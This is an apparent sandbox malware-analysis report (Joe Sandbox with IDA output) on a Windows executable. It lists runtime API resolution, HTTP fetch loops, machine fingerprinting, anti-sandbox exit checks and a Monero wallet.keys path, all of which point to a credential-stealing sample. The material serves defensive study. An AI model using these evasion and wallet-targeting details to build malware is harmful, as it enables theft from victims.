                                • GetProcAddress.KERNEL32(75BD0000,0162D230), ref: 00DDA352
                                • GetProcAddress.KERNEL32(75BD0000,01615CD0), ref: 00DDA36A
                                • GetProcAddress.KERNEL32(75BD0000,01629048), ref: 00DDA382
                                • GetProcAddress.KERNEL32(75BD0000,0162D3B0), ref: 00DDA39B
                                • GetProcAddress.KERNEL32(75BD0000,0162D1E8), ref: 00DDA3B3
                                • GetProcAddress.KERNEL32(75BD0000,01615C10), ref: 00DDA3CB
                                • GetProcAddress.KERNEL32(75BD0000,01615DB0), ref: 00DDA3E4
                                • GetProcAddress.KERNEL32(75BD0000,0162D3C8), ref: 00DDA3FC
                                • GetProcAddress.KERNEL32(75BD0000,0162D1B8), ref: 00DDA414
                                • GetProcAddress.KERNEL32(75A70000,01615D50), ref: 00DDA436
                                • GetProcAddress.KERNEL32(75A70000,0162D368), ref: 00DDA44E
                                • GetProcAddress.KERNEL32(75A70000,0162D188), ref: 00DDA466
                                • GetProcAddress.KERNEL32(75A70000,0162D200), ref: 00DDA47F
                                • GetProcAddress.KERNEL32(75A70000,0162D260), ref: 00DDA497
                                • GetProcAddress.KERNEL32(75450000,01615B70), ref: 00DDA4B8
                                • GetProcAddress.KERNEL32(75450000,01615C30), ref: 00DDA4D1
                                • GetProcAddress.KERNEL32(75DA0000,01615E10), ref: 00DDA4F2
                                • GetProcAddress.KERNEL32(75DA0000,0162D248), ref: 00DDA50A
                                • GetProcAddress.KERNEL32(6F280000,01615CF0), ref: 00DDA530
                                • GetProcAddress.KERNEL32(6F280000,01615BF0), ref: 00DDA548
                                • GetProcAddress.KERNEL32(6F280000,01615E50), ref: 00DDA560
                                • GetProcAddress.KERNEL32(6F280000,0162D2A8), ref: 00DDA579
                                • GetProcAddress.KERNEL32(6F280000,01615AB0), ref: 00DDA591
                                • GetProcAddress.KERNEL32(6F280000,01615BB0), ref: 00DDA5A9
                                • GetProcAddress.KERNEL32(6F280000,01615B90), ref: 00DDA5C2
                                • GetProcAddress.KERNEL32(6F280000,01615BD0), ref: 00DDA5DA
                                • GetProcAddress.KERNEL32(6F280000,InternetSetOptionA), ref: 00DDA5F1
                                • GetProcAddress.KERNEL32(6F280000,HttpQueryInfoA), ref: 00DDA607
                                • GetProcAddress.KERNEL32(75AF0000,0162D2C0), ref: 00DDA629
                                • GetProcAddress.KERNEL32(75AF0000,01628F88), ref: 00DDA641
                                • GetProcAddress.KERNEL32(75AF0000,0162D2D8), ref: 00DDA659
                                • GetProcAddress.KERNEL32(75AF0000,0162D2F0), ref: 00DDA672
                                • GetProcAddress.KERNEL32(75D90000,01615D10), ref: 00DDA693
                                • GetProcAddress.KERNEL32(6CFB0000,0162D110), ref: 00DDA6B4
                                • GetProcAddress.KERNEL32(6CFB0000,01615D70), ref: 00DDA6CD
                                • GetProcAddress.KERNEL32(6CFB0000,0162D308), ref: 00DDA6E5
                                • GetProcAddress.KERNEL32(6CFB0000,0162D380), ref: 00DDA6FD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: HttpQueryInfoA$InternetSetOptionA
                                • API String ID: 2238633743-1775429166
                                • Opcode ID: 96dbca68ce029e7c3abf5b63bf256b29dec5938bb96df10218d4d11a14c2c21b
                                • Instruction ID: 0f15b2ab7e2210399ade5387349bb0a9c80d638741b505c8a2e791a0f38cad14
                                • Opcode Fuzzy Hash: 96dbca68ce029e7c3abf5b63bf256b29dec5938bb96df10218d4d11a14c2c21b
                                • Instruction Fuzzy Hash: C062FAB5710300EFC766DFA8E98896637F9F78C701B14855AA68AC324CDB3F9941DB60

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1033 dc6280-dc630b call dda7a0 call dc47b0 call dda740 InternetOpenA StrCmpCA 1040 dc630d 1033->1040 1041 dc6314-dc6318 1033->1041 1040->1041 1042 dc631e-dc6342 InternetConnectA 1041->1042 1043 dc6509-dc6525 call dda7a0 call dda800 * 2 1041->1043 1045 dc64ff-dc6503 InternetCloseHandle 1042->1045 1046 dc6348-dc634c 1042->1046 1062 dc6528-dc652d 1043->1062 1045->1043 1048 dc634e-dc6358 1046->1048 1049 dc635a 1046->1049 1050 dc6364-dc6392 HttpOpenRequestA 1048->1050 1049->1050 1052 dc6398-dc639c 1050->1052 1053 dc64f5-dc64f9 InternetCloseHandle 1050->1053 1055 dc639e-dc63bf InternetSetOptionA 1052->1055 1056 dc63c5-dc6405 HttpSendRequestA HttpQueryInfoA 1052->1056 1053->1045 1055->1056 1058 dc642c-dc644b call dd8940 1056->1058 1059 dc6407-dc6427 call dda740 call dda800 * 2 1056->1059 1067 dc644d-dc6454 1058->1067 1068 dc64c9-dc64e9 call dda740 call dda800 * 2 1058->1068 1059->1062 1071 dc6456-dc6480 InternetReadFile 1067->1071 1072 dc64c7-dc64ef InternetCloseHandle 1067->1072 1068->1062 1073 dc648b 1071->1073 1074 dc6482-dc6489 1071->1074 1072->1053 1073->1072 1074->1073 1078 dc648d-dc64c5 call dda9b0 call dda8a0 call dda800 1074->1078 1078->1071
                                APIs
                                  • Part of subcall function 00DDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DDA7E6
                                  • Part of subcall function 00DC47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00DC4839
                                  • Part of subcall function 00DC47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00DC4849
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                • InternetOpenA.WININET(00DE0DFE,00000001,00000000,00000000,00000000), ref: 00DC62E1
                                • StrCmpCA.SHLWAPI(?,0162EA98), ref: 00DC6303
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00DC6335
                                • HttpOpenRequestA.WININET(00000000,GET,?,0162E278,00000000,00000000,00400100,00000000), ref: 00DC6385
                                • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00DC63BF
                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DC63D1
                                • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00DC63FD
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00DC646D
                                • InternetCloseHandle.WININET(00000000), ref: 00DC64EF
                                • InternetCloseHandle.WININET(00000000), ref: 00DC64F9
                                • InternetCloseHandle.WININET(00000000), ref: 00DC6503
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                • String ID: ERROR$ERROR$GET
                                • API String ID: 3749127164-2509457195
                                • Opcode ID: aa94fddb9379540247e2237e1b16beee96b72f1d964a81fe6325b57bdba9cb3a
                                • Instruction ID: c3984362f2107ea0b9dd241b809b1fa5ac8b0182812f6849a6d57a36d985637b
                                • Opcode Fuzzy Hash: aa94fddb9379540247e2237e1b16beee96b72f1d964a81fe6325b57bdba9cb3a
                                • Instruction Fuzzy Hash: E7713C71A00258EBDB24DFA4CC49FEE7778FB44700F108199F50A6B284DBB5AA85CF61

                                Control-flow Graph

                                control_flow_graph 1090 dd5510-dd5577 call dd5ad0 call dda820 * 3 call dda740 * 4 1106 dd557c-dd5583 1090->1106 1107 dd5585-dd55b6 call dda820 call dda7a0 call dc1590 call dd51f0 1106->1107 1108 dd55d7-dd564c call dda740 * 2 call dc1590 call dd52c0 call dda8a0 call dda800 call ddaad0 StrCmpCA 1106->1108 1124 dd55bb-dd55d2 call dda8a0 call dda800 1107->1124 1134 dd5693-dd56a9 call ddaad0 StrCmpCA 1108->1134 1138 dd564e-dd568e call dda7a0 call dc1590 call dd51f0 call dda8a0 call dda800 1108->1138 1124->1134 1139 dd57dc-dd5844 call dda8a0 call dda820 * 2 call dc1670 call dda800 * 4 call dd6560 call dc1550 1134->1139 1140 dd56af-dd56b6 1134->1140 1138->1134 1270 dd5ac3-dd5ac6 1139->1270 1143 dd56bc-dd56c3 1140->1143 1144 dd57da-dd585f call ddaad0 StrCmpCA 1140->1144 1148 dd571e-dd5793 call dda740 * 2 call dc1590 call dd52c0 call dda8a0 call dda800 call ddaad0 StrCmpCA 1143->1148 1149 dd56c5-dd5719 call dda820 call dda7a0 call dc1590 call dd51f0 call dda8a0 call dda800 1143->1149 1163 dd5865-dd586c 1144->1163 1164 dd5991-dd59f9 call dda8a0 call dda820 * 2 call dc1670 call dda800 * 4 call dd6560 call dc1550 1144->1164 1148->1144 1249 dd5795-dd57d5 call dda7a0 call dc1590 call dd51f0 call dda8a0 call dda800 1148->1249 1149->1144 1170 dd598f-dd5a14 call ddaad0 StrCmpCA 1163->1170 1171 dd5872-dd5879 1163->1171 1164->1270 1200 dd5a28-dd5a91 call dda8a0 call dda820 * 2 call dc1670 call dda800 * 4 call dd6560 call dc1550 1170->1200 1201 dd5a16-dd5a21 Sleep 1170->1201 1179 dd587b-dd58ce call dda820 call dda7a0 call dc1590 call dd51f0 call dda8a0 call dda800 1171->1179 1180 dd58d3-dd5948 call dda740 * 2 call dc1590 call dd52c0 call dda8a0 call dda800 call ddaad0 StrCmpCA 1171->1180 1179->1170 1180->1170 1275 dd594a-dd598a call dda7a0 call dc1590 call dd51f0 call dda8a0 call dda800 1180->1275 1200->1270 1201->1106 1249->1144 1275->1170
                                APIs
                                  • Part of subcall function 00DDA820: lstrlen.KERNEL32(00DC4F05,?,?,00DC4F05,00DE0DDE), ref: 00DDA82B
                                  • Part of subcall function 00DDA820: lstrcpy.KERNEL32(00DE0DDE,00000000), ref: 00DDA885
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00DD5644
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00DD56A1
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00DD578B
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00DD5940
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00DD5857
                                  • Part of subcall function 00DDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DDA7E6
                                  • Part of subcall function 00DD51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00DD5228
                                  • Part of subcall function 00DDA8A0: lstrcpy.KERNEL32(?,00DE0E17), ref: 00DDA905
                                  • Part of subcall function 00DD52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00DD5318
                                  • Part of subcall function 00DD52C0: lstrlen.KERNEL32(00000000), ref: 00DD532F
                                  • Part of subcall function 00DD52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00DD5364
                                  • Part of subcall function 00DD52C0: lstrlen.KERNEL32(00000000), ref: 00DD5383
                                  • Part of subcall function 00DD52C0: lstrlen.KERNEL32(00000000), ref: 00DD53AE
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00DD5A0C
                                • Sleep.KERNEL32(0000EA60), ref: 00DD5A1B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen$Sleep
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                • API String ID: 507064821-2791005934
                                • Opcode ID: 64f70ba3add8d78cce0295bfc9486e2d7886d57ad5b858c7972ba728f66aec7b
                                • Instruction ID: 7458b1d5586c2a8af6f13aee2b7eac06c8199bf0e5015c4dad3159a1a7654861
                                • Opcode Fuzzy Hash: 64f70ba3add8d78cce0295bfc9486e2d7886d57ad5b858c7972ba728f66aec7b
                                • Instruction Fuzzy Hash: 5EE13175910244AACB14FBA4EC52EED7338EF54300F50C12AB54657295EF35AB0DDBB2

                                Control-flow Graph

                                control_flow_graph 1301 dd17a0-dd17cd call ddaad0 StrCmpCA 1304 dd17cf-dd17d1 ExitProcess 1301->1304 1305 dd17d7-dd17f1 call ddaad0 1301->1305 1309 dd17f4-dd17f8 1305->1309 1310 dd17fe-dd1811 1309->1310 1311 dd19c2-dd19cd call dda800 1309->1311 1312 dd199e-dd19bd 1310->1312 1313 dd1817-dd181a 1310->1313 1312->1309 1315 dd185d-dd186e StrCmpCA 1313->1315 1316 dd187f-dd1890 StrCmpCA 1313->1316 1317 dd1835-dd1844 call dda820 1313->1317 1318 dd18f1-dd1902 StrCmpCA 1313->1318 1319 dd1951-dd1962 StrCmpCA 1313->1319 1320 dd1970-dd1981 StrCmpCA 1313->1320 1321 dd1913-dd1924 StrCmpCA 1313->1321 1322 dd1932-dd1943 StrCmpCA 1313->1322 1323 dd18ad-dd18be StrCmpCA 1313->1323 1324 dd18cf-dd18e0 StrCmpCA 1313->1324 1325 dd198f-dd1999 call dda820 1313->1325 1326 dd1849-dd1858 call dda820 1313->1326 1327 dd1821-dd1830 call dda820 1313->1327 1338 dd187a 1315->1338 1339 dd1870-dd1873 1315->1339 1340 dd189e-dd18a1 1316->1340 1341 dd1892-dd189c 1316->1341 1317->1312 1346 dd190e 1318->1346 1347 dd1904-dd1907 1318->1347 1329 dd196e 1319->1329 1330 dd1964-dd1967 1319->1330 1332 dd198d 1320->1332 1333 dd1983-dd1986 1320->1333 1348 dd1926-dd1929 1321->1348 1349 dd1930 1321->1349 1350 dd194f 1322->1350 1351 dd1945-dd1948 1322->1351 1342 dd18ca 1323->1342 1343 dd18c0-dd18c3 1323->1343 1344 dd18ec 1324->1344 1345 dd18e2-dd18e5 1324->1345 1325->1312 1326->1312 1327->1312 1329->1312 1330->1329 1332->1312 1333->1332 1338->1312 1339->1338 1355 dd18a8 1340->1355 1341->1355 1342->1312 1343->1342 1344->1312 1345->1344 1346->1312 1347->1346 1348->1349 1349->1312 1350->1312 1351->1350 1355->1312
                                APIs
                                • StrCmpCA.SHLWAPI(00000000,block), ref: 00DD17C5
                                • ExitProcess.KERNEL32 ref: 00DD17D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: d26468b4b7e831505b52781ea50c6cc5d8a721d3fae1e722b8bf7df2a8d8f5aa
                                • Instruction ID: 4f5e1d559c8f4ddf01caf5da4d9d9d2ad9f7c6bda57e5ef2b713049bc78556a2
                                • Opcode Fuzzy Hash: d26468b4b7e831505b52781ea50c6cc5d8a721d3fae1e722b8bf7df2a8d8f5aa
                                • Instruction Fuzzy Hash: C35156B8A00209FFCB04DFA1D964BBE7BB5EB44304F14804AE856A7340D775EA55DB71

                                Control-flow Graph

                                control_flow_graph 1356 dd7500-dd754a GetWindowsDirectoryA 1357 dd754c 1356->1357 1358 dd7553-dd75c7 GetVolumeInformationA call dd8d00 * 3 1356->1358 1357->1358 1365 dd75d8-dd75df 1358->1365 1366 dd75fc-dd7617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 dd75e1-dd75fa call dd8d00 1365->1367 1369 dd7619-dd7626 call dda740 1366->1369 1370 dd7628-dd7658 wsprintfA call dda740 1366->1370 1367->1365 1377 dd767e-dd768e 1369->1377 1370->1377
                                APIs
                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00DD7542
                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00DD757F
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DD7603
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00DD760A
                                • wsprintfA.USER32 ref: 00DD7640
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                • String ID: :$C$\
                                • API String ID: 1544550907-3809124531
                                • Opcode ID: 8ec90a34a41480e47e854d20808bf1b859787f2b20e6f82e05e4788e251e9a02
                                • Instruction ID: 751ef2660b4ab1d7509dcee35dbd285a9214f706cbc03ccfbc2c1e9e63298ab5
                                • Opcode Fuzzy Hash: 8ec90a34a41480e47e854d20808bf1b859787f2b20e6f82e05e4788e251e9a02
                                • Instruction Fuzzy Hash: 58417FB1E04358EBDB11DF94DC45BEEBBB8EB08704F10419AF50967280E779AA44CBB5

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00DD9860: GetProcAddress.KERNEL32(74DD0000,01622470), ref: 00DD98A1
                                  • Part of subcall function 00DD9860: GetProcAddress.KERNEL32(74DD0000,016222F0), ref: 00DD98BA
                                  • Part of subcall function 00DD9860: GetProcAddress.KERNEL32(74DD0000,01622290), ref: 00DD98D2
                                  • Part of subcall function 00DD9860: GetProcAddress.KERNEL32(74DD0000,016223E0), ref: 00DD98EA
                                  • Part of subcall function 00DD9860: GetProcAddress.KERNEL32(74DD0000,016224A0), ref: 00DD9903
                                  • Part of subcall function 00DD9860: GetProcAddress.KERNEL32(74DD0000,01628F38), ref: 00DD991B
                                  • Part of subcall function 00DD9860: GetProcAddress.KERNEL32(74DD0000,01615910), ref: 00DD9933
                                  • Part of subcall function 00DD9860: GetProcAddress.KERNEL32(74DD0000,01615930), ref: 00DD994C
                                  • Part of subcall function 00DD9860: GetProcAddress.KERNEL32(74DD0000,01622218), ref: 00DD9964
                                  • Part of subcall function 00DD9860: GetProcAddress.KERNEL32(74DD0000,016223B0), ref: 00DD997C
                                  • Part of subcall function 00DD9860: GetProcAddress.KERNEL32(74DD0000,01622320), ref: 00DD9995
                                  • Part of subcall function 00DD9860: GetProcAddress.KERNEL32(74DD0000,01622440), ref: 00DD99AD
                                  • Part of subcall function 00DD9860: GetProcAddress.KERNEL32(74DD0000,016159B0), ref: 00DD99C5
                                  • Part of subcall function 00DD9860: GetProcAddress.KERNEL32(74DD0000,016222A8), ref: 00DD99DE
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                  • Part of subcall function 00DC11D0: ExitProcess.KERNEL32 ref: 00DC1211
                                  • Part of subcall function 00DC1160: GetSystemInfo.KERNEL32(?), ref: 00DC116A
                                  • Part of subcall function 00DC1160: ExitProcess.KERNEL32 ref: 00DC117E
                                  • Part of subcall function 00DC1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00DC112B
                                  • Part of subcall function 00DC1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00DC1132
                                  • Part of subcall function 00DC1110: ExitProcess.KERNEL32 ref: 00DC1143
                                  • Part of subcall function 00DC1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00DC123E
                                  • Part of subcall function 00DC1220: ExitProcess.KERNEL32 ref: 00DC1294
                                  • Part of subcall function 00DD6770: GetUserDefaultLangID.KERNEL32 ref: 00DD6774
                                  • Part of subcall function 00DC1190: ExitProcess.KERNEL32 ref: 00DC11C6
                                  • Part of subcall function 00DD7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00DC11B7), ref: 00DD7880
                                  • Part of subcall function 00DD7850: RtlAllocateHeap.NTDLL(00000000), ref: 00DD7887
                                  • Part of subcall function 00DD7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00DD789F
                                  • Part of subcall function 00DD78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DD7910
                                  • Part of subcall function 00DD78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00DD7917
                                  • Part of subcall function 00DD78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00DD792F
                                  • Part of subcall function 00DDA9B0: lstrlen.KERNEL32(?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DDA9C5
                                  • Part of subcall function 00DDA9B0: lstrcpy.KERNEL32(00000000), ref: 00DDAA04
                                  • Part of subcall function 00DDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DDAA12
                                  • Part of subcall function 00DDA8A0: lstrcpy.KERNEL32(?,00DE0E17), ref: 00DDA905
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,016290B8,?,00DE110C,?,00000000,?,00DE1110,?,00000000,00DE0AEF), ref: 00DD6ACA
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00DD6AE8
                                • CloseHandle.KERNEL32(00000000), ref: 00DD6AF9
                                • Sleep.KERNEL32(00001770), ref: 00DD6B04
                                • CloseHandle.KERNEL32(?,00000000,?,016290B8,?,00DE110C,?,00000000,?,00DE1110,?,00000000,00DE0AEF), ref: 00DD6B1A
                                • ExitProcess.KERNEL32 ref: 00DD6B22
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
